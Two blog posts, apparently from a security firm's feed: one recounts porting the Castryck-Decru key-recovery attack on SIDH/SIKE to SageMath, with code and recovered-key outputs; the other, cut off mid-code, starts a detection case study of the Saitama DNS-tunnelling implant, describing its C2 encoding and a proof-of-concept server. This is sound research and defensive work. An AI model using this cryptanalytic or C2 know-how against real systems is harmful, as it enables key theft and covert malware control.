This hyperelliptic curve and pair of new points are mapped through a chain of isogenies (known as Richelot isogenies). At the end of this chain, if the hyperelliptic curve can be decomposed back into a product of elliptic curves, then the correct digit must have been guessed. The reason this all works is because of a theorem by Kani (1997) and the ability to construct the auxiliary isogeny from E to C (which in the current implementation abuses the known endomorphism ring of the curve).

Implementing the attack

The following discussion is a fairly informal write-up of the 24-hour period starting from an empty repository and ending with an efficient implementation of the attack. The hope is that this not only helps to give a good review of the pieces that come together for the attack to work, but also gives an impression of the problems which arise when implementing mathematical algorithms (and other issues introduced by rushing fingers a little too excited to type precisely).

Learning Magma: or how I came to love syntax bugs

The first step of converting Magma to SageMath was understanding how to translate the syntax. Some changes, like variable declaration with a := 1; rather than a = 1, were simple to fix up.

Additionally, many of the higher-level mathematical objects such as EllipticCurve() or PolynomialRing() had almost identical representations. For anything I didn’t recognise, it was usually enough to find the function in the Magma Documentation, read the expected behaviour and find the relevant function in the SageMath Documentation. In some cases Magma had support for structures which SageMath didn’t perfectly mirror.

One example of this was that Magma can work with multivariate function fields:

// magma
Uff<u0, u1, v0, v1> := FunctionField(Fp2, 4);

However, when trying to define this in SageMath, it was found that only univariate function fields could be constructed directly. The workaround for this was found in the community support forum where it was explained that you could create a suitable object by first defining a multivariate polynomial ring and then creating the fraction field from it:

# SageMath
Uff_poly.<u0, u1, v0, v1> = PolynomialRing(Fp2, 4)
Uff = Uff_poly.fraction_field()

Mathematics aside, the difference which caused the most bugs during conversion was very simple. Magma accesses elements in arrays using 1-indexing, and when looping through a range, it is inclusive of the upper bound. In contrast, SageMath is 0-indexed and does not include the upper bound. In this sense, Magma behaves in the “old style” similar to Fortran or Pascal, whereas (via Python) SageMath follows the 0-indexing convention started with C (or rather its predecessor B).

As an example: printing out integers from an array in both languages would be achieved as:

// Magma 
my_array := [2,3,5,7,11];

for i in [1..5] do
 print my_array[i];
end for;
// output: 2,3,5,7,11
# SageMath
my_array = [2,3,5,7,11]

for i in range(0,5):
   print(my_array[i])
# output: 2,3,5,7,11

This meant that careless copy-pasting and tidying could easily introduce off-by-one errors throughout the code. This is exactly what happened, and correcting these syntax typos continued right up until the code worked!

Getting organised

The first goal was to reimplement the SIKE_challenge.m file, which was an implementation of the attack which was said to have solved Microsoft’s $IKEp217 challenge (this was announced last year, with a cash bounty of $50,000 for the first team to crack it). The prime used has only half the bits of the NIST level 1 parameters (SIKEp434) and supposedly ran in approximately 5 minutes using the Magma script (too long for the free Magma calculator, sadly…). As such, it was the perfect place to start.

The work to reimplement the attack was split between fairly easy but busy work translating SIKE_challenge.m into valid SageMath and more careful and mathematical work reimplementing the functions in the helper file richelot_aux.m. If this attack worked it would then be a case of changing a handful of lines for the attack on SIKEp434, which was said to take about one hour to complete when running the Magma files.

Opening up richelot_aux.m, the first thing to do was to read through the functions and get an idea of the work ahead:

  • Does22ChainSplit()
    • The main oracle, which given the necessary curves and points returns True when the correct digit is guessed.
    • First thought: not too hard.
  • FromProdToJac() and FromJacToJac()
    • Helper functions for Does22ChainSplit() which takes us from points on an elliptic curve to points on the Jacobian of a hyperelliptic curve and then performs the Richelot isogenies.
    • First thought: very long with a couple scary lines which SageMath might have trouble with
  • Pushing3Chain()
    • Compute a chain of isogenies given a curve, quotienting out a point of order 3^i.
    • First thought: easy. Very similar to code I’ve written before.
    • In fact thanks to a recent update to SageMath by Lorenz Panny, this could probably be swapped out for E.isogeny(K, algorithm="factored"). However, to align the code with the PoC, it was decided to reimplement the function as it appeared in the Magma code.
  • Pushing9Chain() and OddCyclicSumOfSquares()
    • Obsolete code, which could be simply ignored. OddCyclicSumOfSquares() is almost certainly the code which was used to precompute the values u,v in uvtable.m. As there’s no need to recompute this array, the function is not needed.

As the function is short, here’s the Magma, then SageMath version of Pushing3Chain(). This is a fair representation of how similar code written in Magma and SageMath is:

// Magma
function Pushing3Chain(E, P, i)
 // compute chain of isogenies quotienting out a point P of order 3^i
 Fp2 := BaseField(E);
 R<x> := PolynomialRing(Fp2);
 chain := [];
 C := E;
 remainingker := P;
 for j in [1..i] do
   kerpol := x - (3^(i-j)*remainingker)[1];
   C, comp := IsogenyFromKernel(C, kerpol);
   remainingker := comp(remainingker);
   chain cat:=[comp];
 end for;
 return C, chain;
end function;
# SageMath
def Pushing3Chain(E, P, i):
   # Compute chain of isogenies quotienting out a point P of order 3^i
   Fp2 = E.base()
   R.<x> = PolynomialRing(Fp2)
   chain = []
   C = E
   remainingker = P
   for j in range(1, i+1):
       kerpol = x - (3^(i-j)*remainingker)[0]
       comp = EllipticCurveIsogeny(C, kerpol)
       C = comp.codomain()
       remainingker = comp(remainingker)
       chain.append(comp)
   return C, chain

Aside from worrying about the helper functions, Does22ChainSplit() was just as simple to reimplement. SIKE_challenge.m itself was about 300 lines of syntax changes (switching out loops, populating arrays with integers). There was a bit of work composing some isogenies, computing Weil pairings and doing some elliptic curve arithmetic, but thanks to previous experience in writing similar code, the conversion went fairly smoothly.

Two functions to go, this was going to be done by lunch!

Warning: falling back to very slow toy implementation

The first major difficulty came while reimplementing FromProdToJac(). At a high level, this function takes points P,Q on an elliptic curve E and points P_C , Q_C on the elliptic curve C and computes the image of the points (P_C, P) and (Q_C, Q) on the Jacobian of a hyperelliptic curve. Hmm ok maybe that’s not such a high level.

Brushing aside what it does, let’s talk about how it tries to do this.

First, five multivariate equations in four variables are defined. Although the lines which do this look dense, the similarity between Magma and SageMath meant not much work was needed at all. The goal is to find a solution to all five equations, which can then be used to construct the necessary points on the Jacobian of the target hyperelliptic curve. Details of this process are described in section 6.1 of the paper.

The standard method to solve systems of equations like this is to first build a Gröbner basis from the equations. Magma comes with GrobnerBasis() and it is very efficient and works with a wide range of polynomial rings. The following code snippet doesn’t obviously use GrobnerBasis(); instead, a scheme is created from an affine space and the set of equations. Calling Points(V) on the scheme finds the set of points, which are equivalently the set of solutions to the polynomials! Points(V) does this by (in part) calling GrobnerBasis() under the hood.

A4<U0, U1, V0, V1> := AffineSpace(Fp2, 4);
V := Scheme(A4, [eq1, eq2, eq3, eq4, eq5]);

// point with zero coordinates probably correspond to "extra" solutions,
// we should be left with 4 sols (code may fail over small fields)

realsols := [];
for D in Points(V) do
   Dseq := Eltseq(D);
   if not 0 in Dseq then
       realsols cat:= [Dseq];
   end if;
end for;

Rewriting this in SageMath, we get something that looks very similar:

A4.<U0, U1, V0, V1> = AffineSpace(Fp2, 4)
V = A4.subscheme([eq1, eq2, eq3, eq4, eq5])

# point with zero coordinates probably correspond to "extra" solutions,
# we should be left with 4 sols (code may fail over small fields)

realsols = []
for D in V.rational_points():
   Dseq = list(D)
   if not 0 in Dseq:
       realsols.append(Dseq)

Again, like Magma, this calls grobner_basis() under the hood to find the set of points. However, running this code, we get the following message from SageMath:

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.

Uh oh… Just how slow is very slow? When running the attack, FromProdToJac() would be called for each oracle request. This meant it would be called a few hundred times for the easiest $IKEp217 challenge and an order of magnitude more for the hardest parameter set.

To see how slow very slow was, the code was left running while some fresh coffee was brewed and coming back to the terminal, a second warning was now showing:

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.
verbose 0 (1081: multi_polynomial_ideal.py, dimension) Warning: falling back to very slow toy implementation.

Okay, so technically this is progress, but considering the Magma file was totally finished within five minutes, we would need a smarter way to solve this problem if there was any hope to have this script recover the secret key.

When in doubt, make things easier

The usual method when solving problems like this using SageMath is to go crawling through the documentation. This wasn’t the first time a problem like this had come up while implementing algorithms and so the hope was some new ideas would start jumping out if enough documentation was read through.

Years of research experience quickly suggested that the first thing to do was to simply reduce the complexity of the problem. The file SIKE_challenge.sage was rewritten as the new baby_SIDH.sage, which shared a very similar structure, but now with a much smaller, 64-bit prime. The hope was to find something which worked reasonably on this smaller problem, then worry about making it more efficient later, once it was confirmed that the attack worked.

To create baby SIDH SIKEp64, first a prime was found such that p \equiv 3 \pmod 4 and p = 2^a 3^b - 1:

# Baby SIKEp64 parameters
a = 33
b = 19
p = 2^a*3^b - 1
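For illustration, such baby primes can be found by brute force. The sketch below is an assumption about how one might search (the function names are mine, not from the original script), using a self-contained Miller-Rabin test in place of SageMath's is_prime(); note that p = 2^a * 3^b - 1 automatically satisfies p ≡ 3 (mod 4) whenever a >= 2.

```python
def is_prime(n):
    """Deterministic Miller-Rabin for n < 3.3 * 10^24 (first 12 prime bases)."""
    if n < 2:
        return False
    small = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    for q in small:
        if n % q == 0:
            return n == q
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in small:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def find_baby_prime(bits):
    """Search for a prime p = 2^a * 3^b - 1 with exactly `bits` bits.

    Starting at a = 2 guarantees p % 4 == 3, since 2^a * 3^b ≡ 0 (mod 4)."""
    for a in range(2, bits):
        b = 1
        while True:
            p = 2**a * 3**b - 1
            if p.bit_length() > bits:
                break
            if p.bit_length() == bits and is_prime(p):
                return a, b, p
            b += 1
    return None
```

Note that the search may return a different (a, b) pair than the one used in the post; the parameters above (a = 33, b = 19) give one valid 64-bit choice.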

Then reusing some old code from other isogeny projects, fresh public torsion points were generated as well:

def get_l_torsion_basis(E, l):
   n = (p+1) // l
   return (n*G for G in E.gens())

P2, Q2 = get_l_torsion_basis(E_start, 2^a)
P3, Q3 = get_l_torsion_basis(E_start, 3^b)

# Make sure Torsion points are
# generated correctly
assert 2^(a-1)*P2 != infty
assert 3^(b-1)*P3 != infty
assert P2.weil_pairing(Q2, 2^a)^(2^(a-1)) != 1
assert P3.weil_pairing(Q3, 3^b)^(3^(b-1)) != 1

Using the baby parameters with a SIDH key generation, the public data could be pushed back into the attack and…

verbose 0 (3848: multi_polynomial_ideal.py, groebner_basis) Warning: falling back to very slow toy implementation.
verbose 0 (1081: multi_polynomial_ideal.py, dimension) Warning: falling back to very slow toy implementation.

After letting this run for about 30 minutes the program was exited. It was obvious that this method was the wrong avenue for the SageMath implementation. Back to the drawing board.

The things you can do with friends by your SIDH

While trawling through more and more specific searches such as “sagemath fast groebner basis multivariate polynomial ring” (this page seems like it should contain the solution, but nothing ever quite worked), I additionally asked my CryptoHack friends for advice and made a tweet explaining the problem.

SageMath is used by a lot of people in the crypto community, and often people find clever tricks when solving puzzles and CTF challenges which come in handy in times like this. The hope was that someone had solved a similar problem before and could point toward the correct way to construct the solution.

Pretty quickly after reaching out to people, some really cool suggestions were offered. The power of the internet!

  • Lorenz Panny suggested to Weil restrict the equations by introducing an extra variable and move from working in F_{p^2} to F_p
    • This meant the toy implementation of Gröbner was no longer needed, as the polynomial ring would be defined over a simpler field, but the resulting system of equations was so complicated that the code was still too slow
  • Tony Shaska suggested that instead of computing the Gröbner bases, a faster method could be to instead use resultants to remove variables from the equation one at a time and then solve the equation in a univariate polynomial ring and work backwards.
    • This is a clever idea, but SageMath was still too inefficient: the only method available to compute resultants for this polynomial ring was via the determinant of the Sylvester matrix, which is very slow.
  • Bryan Gillespie suggested to try and use the Macaulay2 interface to compute the Gröbner basis. This doesn’t come with SageMath by default, but is free and open-source and can be included pretty easily. It’s also known for being pretty fast
    • This might work, but the current SageMath interface doesn’t allow for sending extension fields to Macaulay2 (it’s not even certain from the documentation that Macaulay2 can do this, but the SageMath interface certainly can’t). For this to have a chance at working, one would first have to re-write the interface.

The solution came from Rémy Oudompheng, who saw a way to avoid the problem altogether:

Are you trying to lift a pair (P, Pc) to the Jacobian? I wonder if it’s easier to lift (P, 0) to a divisor on H, lift (0, Pc) to a divisor and add them? I may be confused but it feels like it gives the answer without solving any equation

Original Tweet

Rémy joined me in the CryptoHack discord and we started chatting more about how this could solve the problem. His novel solution to the lifting described in section 6.1 seemed to be working, and what’s more, the same ideas would carry over to the JacToJac() function. Only days after the initial attack, it was wonderful seeing new perspectives on how to efficiently solve the problem.

This is a beautiful result and I’m really happy to have had the time working with Rémy on this. I never would have had the above insight to dodge the slow toy implementation and it gave me an opportunity to learn more about hyperelliptic curves.

Piecing it all together

While Rémy worked on his novel implementation for FromProdToJac() and FromJacToJac(), the remaining work was to go through the rest of the Magma code and convert it to valid SageMath. With these last two functions finished and the rest of the attack all scripted, it was time to see whether the algorithm could recover Bob’s private key given only public data generated from the baby SIDH parameters.

Before the gratification of a successful run, as is usual with late night coding, some additional off by one errors were introduced and then removed while Rémy pushed the new hyperelliptic lifting and Richelot isogeny code. We both ran our script, which failed dramatically in the last few lines when constructing the private key thanks to more syntax errors:

key = sum(skB[i]*3^(i-1) for i in range(1..b-2))
TypeError: 'generator' object cannot be interpreted as an integer

Off by one and a remaining .. in the range!! Fixing this to what should have been written all along:

# Magma
# key := &+[skB[i]*3^(i-1) : i in [1..b-3]];
# SageMath
key = sum(skB[i]*3^i for i in range(b-3))

the following output appeared in the terminal:

Bridging last gap took: 0.1307520866394043
Bob's secret key revealed as: 15002860
In ternary, this is: [1, 1, 1, 1, 0, 0, 0, 2, 0, 0, 2, 0, 1, 0, 0, 1]
Altogether this took 43.73990249633789 seconds.

It worked!! The attack successfully recovered Bob’s private key in less than a minute, all thanks to some brilliant mathematics. It was so exciting to see Wouter Castryck and Thomas Decru’s attack run in real time on a laptop.

However, a 64-bit prime wasn’t close to being secure from previously known attacks. So, with confidence that the code was correct, the next test was to see whether the implementation was efficient enough to recover private keys on serious SIDH instances. Could it keep up with the Magma implementation?

Monkeying around with cache optimisation

Running the same attack on the SIKE challenge, the code worked but it was incredibly slow. Something along the way was inefficient as our prime grew, so the new task was to try and identify the sluggish code and clean it up. Profiling the script, most of the run time was spent in JacToJac(). This isn’t surprising, as it’s run approximately 100 times for each oracle call, so it is expected to be dominant in the profiling. However, the recorded slow-down from the baby SIDH parameters seemed much more significant than one would expect from approximately tripling the bit-size of the prime.

With some further analysis, the dramatic slowdown of the algorithm was identified. The root of the problem was a SageMath performance issue: rather than caching FiniteField objects, SageMath reconstructs them every time they are needed. The function JacToJac() is particularly affected due to the heavy use of the group law for the Jacobian of a hyperelliptic curve.

When testing equality of points, the code invokes GF(p^k)(...) for all coefficients. The constructor of the FiniteField includes a primality test of p for every call. As this is called on every coefficient of every point when performing arithmetic operations, we’re constructing objects and performing primality tests thousands of times. The larger the prime, the more expensive this construction becomes.

Rémy decided to fix this issue by patching SageMath itself, modifying sage.categories.fields so that the vector space is cached:

from sage.misc.cachefunc import cached_method

@cached_method
def vector_space(self, *args, **kwds):
   ...

This ensures that each distinct vector space is constructed only once.

With this fix, the implementation broke the $IKEp217 challenge in only 15 minutes. Not bad when compared to the purported Magma time of approximately 5 minutes.

Bridging last gap took: 6.489821910858154
Bob's secret key revealed as: 5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2
In ternary, this is: [0, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, 1]
Altogether this took 795.5218527317047 seconds.
sage SIKE_challenge.sage 785.42s user 22.78s system 101% cpu 13:19.19 total

Overnight, Rémy also ran the attack on the SIKEp434 parameter set. The secret key was recovered in only an hour and a half, an amazing result considering the Magma implementation took approximately one hour!

Bridging last gap took: 14.06521987915039
Bob's secret key revealed as: 107365402940497059258054462948684901858655170389077481076399249199
In ternary, this is: [2, 1, 2, 1, 1, 0, 1, 2, 0, 2, 1, 0, 1, 2, 2, 2, 1, 0, 2, 1, 0, 2, 1, 2, 2, 2, 1, 1, 1, 0, 0, 2, 2, 0, 1, 1, 2, 2, 2, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 2, 2, 0, 2, 0, 0, 2, 1, 1, 1, 0, 0, 2, 1, 2, 1, 0, 2, 1, 2, 1, 0, 1, 1, 0, 2, 1, 0, 2, 1, 0, 0, 1, 1, 0, 0, 2, 2, 2, 0, 2, 2, 0, 1, 1, 1, 0, 0, 0, 2, 1, 0, 2, 0, 1, 0, 1, 0, 1, 2, 1, 2, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 0, 0, 0, 1, 1, 2, 0, 1, 1, 1, 0, 1, 1]
Altogether this took 5233.838165044785 seconds.

The next morning, inspired by these results, the goal was to find a way to have this same performance without directly patching SageMath. The motivation for this reimplementation was to allow people to run the code themselves and it was important to make this as easy as possible.

A gentler fix was to set the flag proof.arithmetic(False) in the code. This globally tells SageMath to use (among many things) a much faster, probabilistic primality test. We’re not worried about false positives this could (very rarely) introduce, as we are working with a known, fixed prime. As an example of how dramatic this speed up is, a primality test of a 1024 bit integer is more than 1000 times as fast:

sage: p = random_prime(2^1024)
sage: time is_prime(p)
CPU times: user 2.83 s, sys: 13.4 ms, total: 2.85 s
Wall time: 2.86 s
True
sage: proof.arithmetic(False)
sage: time is_prime(p)
CPU times: user 2.1 ms, sys: 0 ns, total: 2.1 ms
Wall time: 2.11 ms
True

This doesn’t address the construction of the vector space again and again, but by dropping the expensive primality test on every call, the hope was that it would be fast enough (or at least a good start).

By including the proof flag in the script, SIKE_challenge.sage broke the $IKEp217 challenge in 30 minutes without any additional patches:

Bridging last gap took: 9.461672067642212
Bob's secret key revealed as: 5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2
In ternary, this is: [0, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, 1]
Altogether this took 1799.0663061141968 seconds.

However, while this code was running, Robin Jadoul found a way to achieve the same result as Rémy’s SageMath patch with the following in-line monkey patch:

Fp2.<i> = GF(p^2, modulus=x^2+1)
type(Fp2).vector_space = sage.misc.cachefunc.cached_method(type(Fp2).vector_space)

This ensures the vector space is cached as in Rémy’s patch, but the fix can be done at run time. This allows all users of the script to get the speed up without modifying the SageMath source. This is a really important fix, so huge thanks to Robin; without it, the hardest parameter sets would have been out of reach without hard-patching SageMath.

Optimising using mathematics

The next set of performance enhancements are thanks to Rémy’s optimizations of the function JacToJac(). This is the obvious place to focus as it’s where the attack spends most of its time. Optimisations can be viewed in the following pull requests:

Cumulatively, these performance enhancements are fantastic: we see more than a 3-times speed up for the code, pushing the SageMath implementation to be more performant than the Magma implementation!

Optimising using better SageMath practices

The last speed ups came from running profilers on our code and adjusting how objects were called, to avoid slowdown from how Python constructs and manipulates polynomials, points, Jacobians and isogenies. A non-exhaustive list of tricks we used:

  • Hard-code dimension of curve #10
    • When constructing the Jacobian of a hyperelliptic curve, an expensive, redundant computation of the curve’s dimension is performed (a curve’s dimension is always 1). We applied a monkey patch to address this.
  • Twice faster Jacobian quotients #13
    • Using points rather than polynomials for the isogeny kernel uses Vélu’s formulas rather than Kohel’s formulas, which are faster.
    • Elliptic isogenies were made more performant by passing the known degree as an optional argument and removing the internal validity check.

Breaking SIDH on a laptop

To celebrate, let’s look at the recorded runtimes of our implementation across all parameters.

                      Vanilla 🍦   No Proof 😴   Monkey Patch 🐵   Current Version 🏃🏻💨
Baby SIDH (SIKEp64)   1 minute     1 minute      1 minute          5 seconds
$IKEp217 Challenge    -            30 minutes    15 minutes        2 minutes
SIKEp434              -            -             1.5 hours         10 minutes
SIKEp503              -            -             3.5 hours         15 minutes
SIKEp610              -            -             -                 25 minutes
SIKEp751              -            -             -                 1-2 hours

All recorded times were achieved on a MacBook with Intel i7 CPU @ 2.6 GHz on a single core. Elements of the table marked "-" haven't been run.

Although most digits of the key can be recovered one by one, the first set of digits must be collected together. For SIKEp64, $IKEp217 and SIKEp434 only the first two digits need to be collected together, with a worst case of 3^2 = 9 calls to the oracle to recover the values.

However:

  • For SIKEp503 the worst case is we make 3^4 = 81 calls for the first 4 digits.
  • For SIKEp610 the worst case is we make 3^5 = 243 calls for the first 5 digits.
  • For SIKEp751 the worst case is we make 3^6 = 729 calls for the first 6 digits.

This means that in the worst case when attacking SIKEp751 more than half of the computation time is spent collecting the first 6 of the 239 digits!

Estimating the running time

We can estimate an average running time from the expected number of calls to the oracle Does22ChainSplit(). This still won’t be totally accurate but gives some rough estimates which seem to agree with our recorded values.

  • For the first \beta_1 digits, at most 3^{\beta_1} calls to Does22ChainSplit() are needed and half of this on average
  • For the remaining b - \beta_1 digits Does22ChainSplit() is called only once when j = 0 and twice when j = 1 or j = 2. It is then expected on average to call the oracle once a third of the time and twice for the remaining two thirds of the digits.

Expressing the approximate time cost of a single call of Does22ChainSplit() as c, the estimate the total cost can be expressed as:

\displaystyle \textsf{Cost} = c \cdot \frac{3^{\beta_1}}{2} + c \cdot \frac{(b - \beta_1)}{3} + 2c \cdot \frac{2(b - \beta_1)}{3}

Which looks slightly cleaner written as:

\displaystyle \textsf{Cost} = c \left(\frac{3^{\beta_1}}{2} + \frac{5(b - \beta_1)}{3} \right), \; \; \textsf{Worst Start} = c \left(3^{\beta_1} + \frac{5(b - \beta_1)}{3} \right)
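As a sanity check, the model can be evaluated in plain Python. The values of c and \beta_1 below come from the table in this post, and b = 239 is the number of ternary digits for SIKEp751 mentioned earlier:

```python
def average_cost(c, beta1, b):
    # c: seconds per oracle call, beta1: digits guessed together at the start,
    # b: total number of ternary digits in the secret key
    return c * (3**beta1 / 2 + 5 * (b - beta1) / 3)

def worst_start_cost(c, beta1, b):
    # Same model, but assuming the full 3^beta1 guesses for the first digits
    return c * (3**beta1 + 5 * (b - beta1) / 3)
```

For SIKEp751 (c = 8.4 s, \beta_1 = 6, b = 239) this predicts roughly 1.75 hours on average and about 2.6 hours with a worst-case start, matching the table.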

Parameters   c      \beta_1   Average Cost   Worst Case Start
SIKEp64      0.2s   2         5 seconds      7 seconds
$IKEp217     1s     2         2 minutes      2 minutes
SIKEp434     3.4s   2         13 minutes     13 minutes
SIKEp503     4.5s   4         22 minutes     25 minutes
SIKEp610     6s     5         43 minutes     1 hour
SIKEp751     8.4s   6         1.75 hours     2.6 hours
Here, c has been estimated on a MacBook Pro with an Intel Core i7 CPU @ 2.6 GHz. Note: as c was benchmarked from the first oracle calls, these are over-estimates, since the oracle calls become faster as more digits are collected.

Conclusions

As a community, the plan is to keep working on our implementation, attempting to make the code more readable and performant. The end-goal is for this implementation to be a valuable resource that students and researchers can use to learn about this truly beautiful attack.

Furthermore, the community should continue to work together on SageMath. It’s an incredible resource, and the hope is that this blog post is an indication of how versatile and powerful it can be at implementing very high-level mathematics.

Some of the problems we encountered along the way have already been submitted for inclusion in the next release of SageMath. In particular, Lorenz Panny has removed the need for the monkey patch for the FiniteField caching.

The performance enhancements that we have included in our implementation just show how much more room there is to develop this attack and our understanding of the relationship between elliptic curves and higher dimensional Jacobians in cryptanalysis.

Congratulations to Wouter Castryck and Thomas Decru!

What’s next for isogenies?

  • With only a preliminary version of the attack on eprint, it will take the full paper, and community research time to really understand how far the Castryck-Decru attack can be generalised.
  • Unlike some historic attacks, simply increasing key sizes for SIKE is not sufficient. If SIDH is to reappear as a cryptographic protocol, it will need a design overhaul to remove all the structure which this attack relies on for key recovery.
    • As this blog post was being edited, a proposal to modify SIDH to protect against this attack, Masked-degree SIDH by Tomoki Moriya, appeared on eprint.
  • Other isogeny protocols such as CSIDH and SQISign seem to be safe from this attack. This is because neither of these protocols have a known secret isogeny degree or the image of the torsion points in public data.
  • More generally, the appearance of such a brilliant attack on a cryptosystem that stood unbroken for a decade will shake confidence in constructing protocols using isogeny problems. From the experts, the message is that there’s a lot of research to do now, which can only lead to more exciting results.

Acknowledgements

Many thanks to Rémy Oudompheng for collaborating with me on this project and teaching me so much about higher-genus isogenies. My additional thanks to Rémy Oudompheng and Lorenz Panny for feedback on my description of the attack, and my colleagues at NCC Group: Paul Bottinelli, Kevin Henry, Elena Bakos Lang and Thomas Pornin for their valuable feedback on an earlier draft of this blog post.

Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 

By: Max Groot
11 August 2022 at 15:20

Max Groot & Ruud van Luijk

TL;DR

A malware sample dubbed ‘Saitama’ was recently uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group’s Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama.

Introduction

For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTP’s) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.  

In May 2022, security firm Malwarebytes published a two-part blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed ‘Saitama’, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.  

Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOC’s) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process.  

To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama. This can be used to control the implant in a lab environment. Moreover, ‘on the wire’ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant’s traffic, using a Suricata signature and behavioural detection. 

Reconstructing the Saitama traffic 

The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant’s behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. 

If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the “PCAP or it didn’t happen” philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. 

The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant “for the greater good”, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.  

Let’s do the twist

The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker’s perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.  

For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.  

On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (“haruto” for the variant discussed here) and a shared initial character set (“razupgnv2w01eos4t38h7yqidxmkljc6b9f5”), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every ‘twist’. 

Function used by Saitama client to convert an integer into an encoded string

To encode this counter, the implant relies on a function named ‘_IntToString’. This function receives an integer and a ‘base string’, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable ‘str’ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. 
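Based on this description, the encoder can be sketched in Python as ordinary base conversion. This is a simplified sketch (function names are mine, and the real implant is a .NET binary whose arithmetic differs slightly, which is why the server-side inversion described below must verify and search for the correct seed):

```python
INITIAL_CHARSET = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared base string

def int_to_string(number, base_string=INITIAL_CHARSET):
    # Repeatedly pick a character using the input number and prepend it to
    # the output, dividing (rounding down) by the character set length on
    # each iteration, until the number reaches zero.
    s = ""
    while number > 0:
        s = base_string[number % len(base_string)] + s
        number //= len(base_string)
    return s

def string_to_int(s, base_string=INITIAL_CHARSET):
    # Idealized inversion: substitute each character back into its index.
    n = 0
    for ch in s:
        n = n * len(base_string) + base_string.index(ch)
    return n
```

With a 36-character base string, the maximum initial counter of 46655 (36^3 - 1) encodes to exactly three characters.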

To determine the initial seed, the server has to ‘invert’ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion, because the conversion rounds down without any decimals. The server tries to invert this conversion using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client, and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server simply tries successively higher numbers until the correct seed is found.

Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same ‘language’. The server then simply substitutes the characters from the shuffled alphabet back into the ‘base’ alphabet to derive what data was sent by the client.  

Server-side implementation to arrive at the same shuffled alphabet as the client
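To illustrate the idea, here is a hedged sketch of the shuffling and substitution in Python. Python's random module also uses the Mersenne Twister, but its seeding and shuffle routine will not match the implant bit-for-bit; the server-side implementation published on the Fox-IT GitHub reproduces the exact client behaviour.

```python
import random

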